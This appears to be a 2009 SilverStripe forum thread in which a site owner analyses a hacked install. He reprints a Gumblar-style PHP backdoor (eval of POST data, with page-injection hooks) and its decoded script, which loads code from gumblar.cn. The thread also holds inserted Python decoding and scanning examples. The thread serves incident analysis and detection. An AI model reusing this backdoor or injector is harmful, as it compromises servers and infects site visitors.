BUG + HACK standard install WARNING - Blog "image.php" identical duplicates created in blog|cms|sapphire /images/


stayatplay

Community Member, 13 Posts

6 May 2009 at 5:31pm

Edited: 06/05/2009 6:09pm

Continuing to investigate...

file "sapphire/_config.php" (md5: E346AEA21C8935FFAC52472256BEB94D)

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihDcVBBKXt2YXIgb09CWHo9JyUnO3ZhciBDYWp5PSd2YXIsMjBhLDNkLDIyLDUzY3JpcHQsNDUsNmVnaSw2ZWUsMjIsMmMsNjIsM2QsMjJWZXJzaW8sNmUoLDI5KywyMiwyY2osM2QsMjIsMjIsMmN1LDNkLDZlYXZpZ2F0b3IsMmV1LDczLDY1ckFnLDY1biw3NCwzYmksNjYoKCw3NSwyZSw2OW4sNjRleE9mLDI4LDIyV2luLDIyKSwzZTApLDI2LDI2KHUsMmVpbmRleE9mKCwyMiw0ZVQsMjA2LDIyLDI5LDNjMCksMjYsMjYoZG8sNjN1bWVuLDc0LDJlY29va2ksNjUsMmVpbmRleE9mKCwyMm1pZWssM2QxLDIyKSwzYzApLDI2LDI2KCw3NHlwZW9mLDI4enJ2enRzKSwyMSwzZHR5LDcwZSw2ZmYoLDIyQSwyMikpLDI5LDdienIsNzYsN2EsNzRzLDNkLDIyQSwyMiwzYmV2YWwsMjgsMjJpLDY2KHcsNjluLDY0byw3NywyZSwyMithKywyMilqLDNkaissMjIrLDYxLDJiLDIyTSw2MWpvciwyMissNjIrYSssMjJNaW5vciwyMitiK2ErLDIyLDQydWksNmNkLDIyK2IrLDIyaiwzYiwyMiksM2JkLDZmY3VtZW50LDJldyw3Mml0ZSgsMjIsM2NzYyw3MmksNzAsNzQsMjBzLDcyYywzZCwyZiwyZmcsNzVtYiw2Y2FyLDJlY24sMmZycyw3MywyZiwzZmlkLDNkLDIyK2osMmIsMjIsM2UsM2MsNWMsMmZzY3JpcHQsM2UsMjIsMjksM2IsN2QnO3ZhciBvMjhTUz1DYWp5LnJlcGxhY2UoQ3FQQSxvT0JYeik7ZXZhbCh1bmVzY2FwZShvMjhTUykpfSkoLywvZyk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php

/**
 * Sapphire configuration file
 *
 * Here you can make different settings for the Sapphire module (the core
 * module).
 *
 * For example you can register the authentication methods you wish to use
 * on your site, e.g. to register the OpenID authentication method type
 *
 * <code>
 * Authenticator::register_authenticator('OpenIDAuthenticator');
 * </code>
 *
 * @package sapphire
 * @subpackage core
 */

// Default director
Director::addRules(10, array(
	'Security//$Action/$ID/$OtherID' => 'Security',
	//'Security/$Action/$ID' => 'Security',
	'db//$Action' => 'DatabaseAdmin',
	'$Controller//$Action/$ID/$OtherID' => '*',
	'images' => 'Image_Uploader',
	'' => 'RootURLController',
	'api/v1/live' => 'VersionedRestfulServer',
	'api/v1' => 'RestfulServer',
	'soap/v1' => 'SOAPModelAccess',
	'dev' => 'DevelopmentAdmin'
));

Director::addRules(1, array(
	'$URLSegment//$Action/$ID/$OtherID' => 'ModelAsController',
));

/**
 * PHP 5.2 has a namespace conflict with our datetime class,
 * for legacy support, we use this overload method.
 * // ENFORCE STRONG_CREATE
 */
Object::useCustomClass('Datetime','SSDatetime',true);

/**
 * Add pear parser to include path
 */
$path = Director::baseFolder().'/sapphire/parsers/';
set_include_path(str_replace('.' . PATH_SEPARATOR, '.' . PATH_SEPARATOR . $path . PATH_SEPARATOR, get_include_path())); 

/**
 * Define a default language different than english
 */
//i18n::set_locale('ca_AD'); 


/**
 * The root directory of TinyMCE
 */
define('MCE_ROOT', 'jsparty/tiny_mce2/');

/**
 * The secret key that needs to be sent along with pings to /Email_BounceHandler
 *
 * Change this to something different for increase security (you can
 * override it in mysite/_config.php to ease upgrades).
 * For more information see:
 * {@link http://doc.silverstripe.com/doku.php?id=email_bouncehandler}
 */
define('EMAIL_BOUNCEHANDLER_KEY', '1aaaf8fb60ea253dbf6efa71baaacbb3');

?>

where only the top is changed, although it's a long line and ends with a php close tag.

using http://www.functions-online.com/base64_decode.html the obfuscated part turns into this...

<script language=javascript><!-- 
(function(CqPA){var oOBXz='%';var Cajy='var,20a,3d,22,53cript,45,6egi,6ee,22,2c,62,3d,22Versio,6e(,29+,22,2cj,3d,22,22,2cu,3d,6eavigator,2eu,73,65rAg,65n,74,3bi,66((,75,2e,69n,64exOf,28,22Win,22),3e0),26,26(u,2eindexOf(,22,4eT,206,22,29,3c0),26,26(do,63umen,74,2ecooki,65,2eindexOf(,22miek,3d1,22),3c0),26,26(,74ypeof,28zrvzts),21,3dty,70e,6ff(,22A,22)),29,7bzr,76,7a,74s,3d,22A,22,3beval,28,22i,66(w,69n,64o,77,2e,22+a+,22)j,3dj+,22+,61,2b,22M,61jor,22+,62+a+,22Minor,22+b+a+,22,42ui,6cd,22+b+,22j,3b,22),3bd,6fcument,2ew,72ite(,22,3csc,72i,70,74,20s,72c,3d,2f,2fg,75mb,6car,2ecn,2frs,73,2f,3fid,3d,22+j,2b,22,3e,3c,5c,2fscript,3e,22,29,3b,7d';var o28SS=Cajy.replace(CqPA,oOBXz);eval(unescape(o28SS))})(/,/g);
 --></script>

then substituting ',' for '%' then using http://www.functions-online.com/urldecode.html the obfuscated part turns into this...

var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window." a ")j=j " a+"Major" b a "Minor" b a "Build" b "j;");document.write("<script src=//gumblar.cn/rss/?id=" j+"><\/script>");}

Again, same web site, "gumblar.cn" flagged for malware and trojans by McAfee SiteAdvisor and Google safe browsing.
[ see http://www.siteadvisor.com/sites/gumblar.cn for report ]
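
The two decoding steps described in the post above (base64, then ',' replaced by '%' and URL-decoded), done statically in Python without evaluating anything. This is an added example, not part of the original thread: EXCERPT is the tail of the string quoted above, while the wrapper around it, SAMPLE_PHP and all function names are constructed for illustration.

```python
import base64
import re
from urllib.parse import unquote, unquote_plus

# Tail of the obfuscated string quoted in the post above (copied from the page).
EXCERPT = ("d,6fcument,2ew,72ite(,22,3csc,72i,70,74,20s,72c,3d,2f,2fg,75mb,6car,"
           "2ecn,2frs,73,2f,3fid,3d,22+j,2b,22,3e,3c,5c,2fscript,3e,22,29,3b,7d")

# Constructed sample: the excerpt inside the same wrapper shape as the injected
# line, so the example runs offline without the full payload.
SAMPLE_JS = ("(function(CqPA){var oOBXz='%';var Cajy='" + EXCERPT + "';"
             "var o28SS=Cajy.replace(CqPA,oOBXz);eval(unescape(o28SS))})(/,/g);")
SAMPLE_PHP = ("define('TMP_XHGFJOKL',base64_decode('"
              + base64.b64encode(SAMPLE_JS.encode("ascii")).decode("ascii") + "'));")

B64_CALL = re.compile(r"base64_decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)")
QUOTED = re.compile(r"'([^'\\]*)'")
HEX_TOKEN = re.compile(r",[0-9a-fA-F]{2}")
SCRIPT_SRC = re.compile(r"""src=["']?(?:https?:)?//([^/"'\s>]+)""")


def decode_base64_layer(php_source):
    """Return the plaintext of every base64_decode('...') literal; no PHP is run."""
    decoded = []
    for match in B64_CALL.finditer(php_source):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
        except ValueError:          # malformed base64: skip it, keep scanning
            continue
        decoded.append(raw.decode("latin-1"))
    return decoded


def decode_comma_hex_layer(js_source, min_tokens=10, plus_as_space=False):
    """Decode string literals that hide %XX escapes behind ',' separators.

    Mirrors Cajy.replace(/,/g, '%') followed by unescape(), but only returns
    the text. Limitation: unescape()'s %uXXXX form is not handled here.
    """
    decoder = unquote_plus if plus_as_space else unquote
    decoded = []
    for match in QUOTED.finditer(js_source):
        literal = match.group(1)
        if len(HEX_TOKEN.findall(literal)) < min_tokens:
            continue                # ordinary string, not an encoded payload
        decoded.append(decoder(literal.replace(",", "%"), encoding="latin-1"))
    return decoded


def script_hosts(decoded_js):
    """Hosts referenced by src=//host/... in the decoded script."""
    return sorted(set(SCRIPT_SRC.findall(decoded_js)))


def analyse(php_source):
    """Peel both layers and list the external script hosts the payload loads."""
    hosts = []
    for js in decode_base64_layer(php_source):
        for plain in decode_comma_hex_layer(js):
            hosts.extend(script_hosts(plain))
    return sorted(set(hosts))


if __name__ == "__main__":
    for js in decode_base64_layer(SAMPLE_PHP):
        for plain in decode_comma_hex_layer(js):
            print(plain)
    print(analyse(SAMPLE_PHP))
```

With `plus_as_space=True` the decoder behaves like form-style URL decoding and turns each literal `+` into a space; JavaScript's `unescape()` leaves `+` untouched, so the default output is the text a browser would actually evaluate.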

stayatplay

Community Member, 13 Posts

6 May 2009 at 5:59pm

Edited: 06/05/2009 6:02pm

Continuing to investigate other files...

file "cms/_config.php" ( md5: 5ECF9B3109A75050C97330DF18889ADD )

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihDcVBBKXt2YXIgb09CWHo9JyUnO3ZhciBDYWp5PSd2YXIsMjBhLDNkLDIyLDUzY3JpcHQsNDUsNmVnaSw2ZWUsMjIsMmMsNjIsM2QsMjJWZXJzaW8sNmUoLDI5KywyMiwyY2osM2QsMjIsMjIsMmN1LDNkLDZlYXZpZ2F0b3IsMmV1LDczLDY1ckFnLDY1biw3NCwzYmksNjYoKCw3NSwyZSw2OW4sNjRleE9mLDI4LDIyV2luLDIyKSwzZTApLDI2LDI2KHUsMmVpbmRleE9mKCwyMiw0ZVQsMjA2LDIyLDI5LDNjMCksMjYsMjYoZG8sNjN1bWVuLDc0LDJlY29va2ksNjUsMmVpbmRleE9mKCwyMm1pZWssM2QxLDIyKSwzYzApLDI2LDI2KCw3NHlwZW9mLDI4enJ2enRzKSwyMSwzZHR5LDcwZSw2ZmYoLDIyQSwyMikpLDI5LDdienIsNzYsN2EsNzRzLDNkLDIyQSwyMiwzYmV2YWwsMjgsMjJpLDY2KHcsNjluLDY0byw3NywyZSwyMithKywyMilqLDNkaissMjIrLDYxLDJiLDIyTSw2MWpvciwyMissNjIrYSssMjJNaW5vciwyMitiK2ErLDIyLDQydWksNmNkLDIyK2IrLDIyaiwzYiwyMiksM2JkLDZmY3VtZW50LDJldyw3Mml0ZSgsMjIsM2NzYyw3MmksNzAsNzQsMjBzLDcyYywzZCwyZiwyZmcsNzVtYiw2Y2FyLDJlY24sMmZycyw3MywyZiwzZmlkLDNkLDIyK2osMmIsMjIsM2UsM2MsNWMsMmZzY3JpcHQsM2UsMjIsMjksM2IsN2QnO3ZhciBvMjhTUz1DYWp5LnJlcGxhY2UoQ3FQQSxvT0JYeik7ZXZhbCh1bmVzY2FwZShvMjhTUykpfSkoLywvZyk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php

/**
 * Extended URL rules for the CMS module
 * 
 * @package cms
 */
Director::addRules(50, array(
	'processes//$Action/$ID/$Batch' => 'BatchProcess_Controller',
	'admin/help//$Action/$ID' => 'CMSHelp',
	'admin/ReportField//$Action/$ID/$Type/$OtherID' => 'ReportField_Controller',
	'admin/bulkload//$Action/$ID/$OtherID' => 'BulkLoaderAdmin',
	'admin//ImageEditor/$Action' => 'ImageEditor',
	'admin/cms//$Action/$ID/$OtherID' => 'CMSMain', 
	'PageComment//$Action/$ID' => 'PageComment_Controller',
	'dev/buildcache' => 'RebuildStaticCacheTask',
));

CMSMenu::populate_menu();
?>

where only the top line is changed, although it's a long line and ends with a php close tag.
Decoding the obfuscated part in top line,
using http://www.functions-online.com/base64_decode.html that turns into this...

<script language=javascript><!-- 
(function(CqPA){var oOBXz='%';var Cajy='var,20a,3d,22,53cript,45,6egi,6ee,22,2c,62,3d,22Versio,6e(,29+,22,2cj,3d,22,22,2cu,3d,6eavigator,2eu,73,65rAg,65n,74,3bi,66((,75,2e,69n,64exOf,28,22Win,22),3e0),26,26(u,2eindexOf(,22,4eT,206,22,29,3c0),26,26(do,63umen,74,2ecooki,65,2eindexOf(,22miek,3d1,22),3c0),26,26(,74ypeof,28zrvzts),21,3dty,70e,6ff(,22A,22)),29,7bzr,76,7a,74s,3d,22A,22,3beval,28,22i,66(w,69n,64o,77,2e,22+a+,22)j,3dj+,22+,61,2b,22M,61jor,22+,62+a+,22Minor,22+b+a+,22,42ui,6cd,22+b+,22j,3b,22),3bd,6fcument,2ew,72ite(,22,3csc,72i,70,74,20s,72c,3d,2f,2fg,75mb,6car,2ecn,2frs,73,2f,3fid,3d,22+j,2b,22,3e,3c,5c,2fscript,3e,22,29,3b,7d';var o28SS=Cajy.replace(CqPA,oOBXz);eval(unescape(o28SS))})(/,/g);
 --></script>

then substituting ',' for '%' then using http://www.functions-online.com/urldecode.html turns into this...

var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window." a ")j=j " a+"Major" b a "Minor" b a "Build" b "j;");document.write("<script src=//gumblar.cn/rss/?id=" j+"><\/script>");}

Same site, again, "gumblar.cn" flagged for malware and trojans by McAfee SiteAdvisor and Google safe browsing.
[ see http://www.siteadvisor.com/sites/gumblar.cn for report ]

stayatplay

Community Member, 13 Posts

7 May 2009 at 3:09am

Edited: 07/05/2009 4:06am

I found the "assets/error-404.html" file was also hacked.

<script language=javascript><!--
(function(CqPA){var oOBXz='%';var Cajy='var,20a,3d,22,53cript,45,6egi,6ee,22,2c,62,3d,22Versio,6e(,29+,22,2cj,3d,22,22,2cu,3d,6eavigator,2eu,73,65rAg,65n,74,3bi,66((,75,2e,69n,64exOf,28,22Win,22),3e0),26,26(u,2eindexOf(,22,4eT,206,22,29,3c0),26,26(do,63umen,74,2ecooki,65,2eindexOf(,22miek,3d1,22),3c0),26,26(,74ypeof,28zrvzts),21,3dty,70e,6ff(,22A,22)),29,7bzr,76,7a,74s,3d,22A,22,3beval,28,22i,66(w,69n,64o,77,2e,22+a+,22)j,3dj+,22+,61,2b,22M,61jor,22+,62+a+,22Minor,22+b+a+,22,42ui,6cd,22+b+,22j,3b,22),3bd,6fcument,2ew,72ite(,22,3csc,72i,70,74,20s,72c,3d,2f,2fg,75mb,6car,2ecn,2frs,73,2f,3fid,3d,22+j,2b,22,3e,3c,5c,2fscript,3e,22,29,3b,7d';var o28SS=Cajy.replace(CqPA,oOBXz);eval(unescape(o28SS))})(/,/g);
--></script><body>

There was also a file in a folder in the root directory of the site, "webstats.orig/index.html" (68716662B790FEB2B3EE3AD348E3691F), that was also corrupted.
Decoding it, it had this in it...

var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window." a ")j=j " a+"Major" b a "Minor" b a "Build" b "j;");document.write("<script src=//gumblar.cn/rss/?id=" j+"><\/script>");}

Same server in China.

A search for the string "function(CqPA){var oOBXz" without the quotes
yielded the files:
tiny_mce_improvements.js
prototype-safe.js
loader.js
prototype15.js
behaviour.js
leftandmain.js
prototype_improvements.js
highlight.js
cmsmain.js
prototype.js
hover.js
base.js
layout_helpers.js

ALL had the following line somewhere in the file... with "base.js" and "leftandmain.js" having it 3 times.

<!--
(function(CqPA){var oOBXz='%';var Cajy='var,20a,3d,22,53cript,45,6egi,6ee,22,2c,62,3d,22Versio,6e(,29+,22,2cj,3d,22,22,2cu,3d,6eavigator,2eu,73,65rAg,65n,74,3bi,66((,75,2e,69n,64exOf,28,22Win,22),3e0),26,26(u,2eindexOf(,22,4eT,206,22,29,3c0),26,26(do,63umen,74,2ecooki,65,2eindexOf(,22miek,3d1,22),3c0),26,26(,74ypeof,28zrvzts),21,3dty,70e,6ff(,22A,22)),29,7bzr,76,7a,74s,3d,22A,22,3beval,28,22i,66(w,69n,64o,77,2e,22+a+,22)j,3dj+,22+,61,2b,22M,61jor,22+,62+a+,22Minor,22+b+a+,22,42ui,6cd,22+b+,22j,3b,22),3bd,6fcument,2ew,72ite(,22,3csc,72i,70,74,20s,72c,3d,2f,2fg,75mb,6car,2ecn,2frs,73,2f,3fid,3d,22+j,2b,22,3e,3c,5c,2fscript,3e,22,29,3b,7d';var o28SS=Cajy.replace(CqPA,oOBXz);eval(unescape(o28SS))})(/,/g);
-->

also the "webstats" directory at root of site.

stayatplay

Community Member, 13 Posts

7 May 2009 at 6:06am

Found another 2 .js files affected, these with 3 copies each, permutations of the same thing...

var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window." a ")j=j " a+"Major" b a "Minor" b a "Build" b "j;");document.write("<script src=//gumblar.cn/rss/?id=" j+"><\/script>");}
var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window." a ")j=j+"+a "Major" b a+"Minor" b+a+"Build"+b "j;");document.write("<script src=//gumblar.cn/rss/?id="+j "><\/script>");}
var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window." a ")j=j+"+a "Major" b a+"Minor"+b a "Build" b+"j;");document.write("<script src=//gumblar.cn/rss/?id=" j "><\/script>");}

Ingo

Forum Moderator, 801 Posts

7 May 2009 at 9:03am

The fact that only certain *.php, *.js and *.html files were modified means it might be a targeted attack on SilverStripe. Together with Ronan's observation of the same hack on other servers, this means it's not a custom job but possibly a scripted remote attack. Can you confirm that other files haven't been affected? Just do a global search for "eval(base64_decode", that should give it away fairly easily.

@Hugo: You're stating to use the latest version of SilverStripe, which version number? This is a very important piece of information for us. We've released a critical security update mid March (2.3.1), see http://groups.google.com/group/silverstripe-announce/browse_thread/thread/e50889fbd4b8ca52

As Ronan said, it's hard to determine the cause of the hack by this information, it could still be a wrongly configured webserver, or another web application interfering. We need webserver access logs, php error logs from the period when you suspect the hack to have taken place.
I've sent you more specific information to look for in the access logs by email.

In general, please report potential hacks to security/at/silverstripe.com. Use this email address for the log files etc. as well - we'll update this forum post and our other announce lists if we find anything directly related to SilverStripe.
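
A file-tree triage scan for the indicators reported in this thread, as an added Python example (not SilverStripe's or any poster's code). Besides the literal "eval(base64_decode" search, it matches the pieces visible in the injected line quoted earlier, which pairs `eval($_POST[...])` with `define(...,base64_decode(...))`; the signature labels and the demo files are constructed for illustration.

```python
import os
import re
import tempfile

# Byte-level signatures taken from the samples quoted in this thread.
# The dictionary keys are labels invented for this example.
SIGNATURES = {
    "php_eval_base64": re.compile(rb"eval\s*\(\s*base64_decode\s*\("),
    "php_eval_request": re.compile(rb"eval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b"),
    "php_base64_literal": re.compile(rb"base64_decode\s*\(\s*'[A-Za-z0-9+/=]{200,}'"),
    "php_ob_hook": re.compile(rb"ob_start\s*\(\s*'tmp_[a-z0-9]+'"),
    "js_eval_unescape": re.compile(rb"eval\s*\(\s*unescape\s*\("),
    "js_thread_marker": re.compile(re.escape(b"function(CqPA){var oOBXz")),
}
SCAN_EXTENSIONS = (".php", ".js", ".html", ".htm")
PREPENDED = re.compile(rb"\?>\s*<\?php")


def scan_file(path, long_line=500):
    """Return {signature_label: hit_count} for one file (empty dict if clean)."""
    with open(path, "rb") as fh:
        data = fh.read()
    hits = {}
    for label, rx in SIGNATURES.items():
        count = len(rx.findall(data))
        if count:
            hits[label] = count
    # The posts note that only the first line changed: one very long line that
    # closes PHP and immediately reopens it in front of the original file.
    first_line = data.split(b"\n", 1)[0]
    if (path.lower().endswith(".php") and len(first_line) > long_line
            and PREPENDED.search(first_line)):
        hits["php_prepended_block"] = 1
    return hits


def scan_tree(root):
    """Walk root and report every scanned file with at least one hit."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            hits = scan_file(path)
            if hits:
                report[os.path.relpath(path, root)] = hits
    return report


def build_demo_tree():
    """Write constructed sample files (never executed) into a temp directory."""
    root = tempfile.mkdtemp(prefix="scan_demo_")
    injected = (b"<?php if(!function_exists('tmp_lkojfghx')){"
                b"if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);"
                b"define('TMP_XHGFJOKL',base64_decode('" + b"QUJD" * 120 + b"'));"
                b"ob_start('tmp_lkojfghx');} ?><?php\n// original config follows\n")
    stub = b"<!--\n(function(CqPA){var oOBXz='%';/* constructed stub */})(/,/g);\n-->\n"
    files = {
        os.path.join("sapphire", "_config.php"): injected,
        os.path.join("mysite", "_config.php"): b"<?php\n// clean file\n",
        os.path.join("jsparty", "base.js"): b"var x = 1;\n" + stub * 3,
    }
    for rel, content in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, hits in sorted(scan_tree(build_demo_tree()).items()):
        print(rel, hits)
```

Hits are triage leads rather than verdicts: compare each flagged file against the matching file from the original release archive before replacing it.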

Ingo

Forum Moderator, 801 Posts

7 May 2009 at 11:46am

I'm currently waiting for Hugo to send me the apache and php logs so we can investigate. The fact that he used 2.3.1 means that we might have an unpatched vulnerability unfortunately. Ronan, do you have any info about the SilverStripe versions you investigated? And perhaps even apache logs for those?

stayatplay

Community Member, 13 Posts

7 May 2009 at 12:20pm

Edited: 07/05/2009 12:21pm

The version has been added at the top of the thread...
>> Using SilverStripe-v2.3.1.tar.gz md5: e58977eb716f1d7b1ad28c12dc993486
>> Using blog-v0.2.0.tar.gz md5: 781dd48c9ae1b30ec31e8a826ddd95dc

I've sent all the logs I have access to but since it's a security issue I suspect Hostway won't want to share any more info, even though I asked that they get in touch with you at your security e-mail. I told them in writing that I give them permission to share the stuff with you and gave them your e-mail addresses.

I sent them your e-mail earlier stating the problem and sent them a compilation just now of all the e-mail and links to this thread.

-Hugo.

stayatplay

Community Member, 13 Posts

8 May 2009 at 2:48am

Edited: 08/05/2009 2:49am

I also discovered that all the HTML files outside the Silverstripe installation had also been modified on the same date, as well as the JavaScript ".js" files, to insert the code:

<script language=javascript><!-- 
(function(CqPA){var oOBXz='%';var Cajy='var,20a,3d,22,53cript,45,6egi,6ee,22,2c,62,3d,22Versio,6e(,29+,22,2cj,3d,22,22,2cu,3d,6eavigator,2eu,73,65rAg,65n,74,3bi,66((,75,2e,69n,64exOf,28,22Win,22),3e0),26,26(u,2eindexOf(,22,4eT,206,22,29,3c0),26,26(do,63umen,74,2ecooki,65,2eindexOf(,22miek,3d1,22),3c0),26,26(,74ypeof,28zrvzts),21,3dty,70e,6ff(,22A,22)),29,7bzr,76,7a,74s,3d,22A,22,3beval,28,22i,66(w,69n,64o,77,2e,22+a+,22)j,3dj+,22+,61,2b,22M,61jor,22+,62+a+,22Minor,22+b+a+,22,42ui,6cd,22+b+,22j,3b,22),3bd,6fcument,2ew,72ite(,22,3csc,72i,70,74,20s,72c,3d,2f,2fg,75mb,6car,2ecn,2frs,73,2f,3fid,3d,22+j,2b,22,3e,3c,5c,2fscript,3e,22,29,3b,7d';var o28SS=Cajy.replace(CqPA,oOBXz);eval(unescape(o28SS))})(/,/g);
 --></script>

again, substituting commas for % signs and using urldecode, you get:

var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window." a ")j=j " a+"Major" b a "Minor" b a "Build" b "j;");document.write("<script src=//gumblar.cn/rss/?id=" j+"><\/script>");}

Same hack.
I deleted those and replaced them with the original versions.